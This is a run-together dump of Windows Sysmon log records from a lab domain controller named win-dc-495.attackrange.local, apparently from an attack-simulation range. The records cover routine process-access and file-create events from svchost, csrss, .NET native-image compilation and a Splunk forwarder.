13:49:45.760{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4303-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.745{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4303-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.745{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4303-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:45.682{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10d0-0\Microsoft.GroupPolicy.Targeting.dll2021-01-18 13:49:45.682 10341000x80000000000000007575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.573{59A5CD1D-91F9-6005-4203-00000000A301}16521336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.433{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.995{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.839{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.823{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.823{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:49:46.760{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13fc-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:49:46.760 10341000x80000000000000007623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.604{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.573{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.573{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
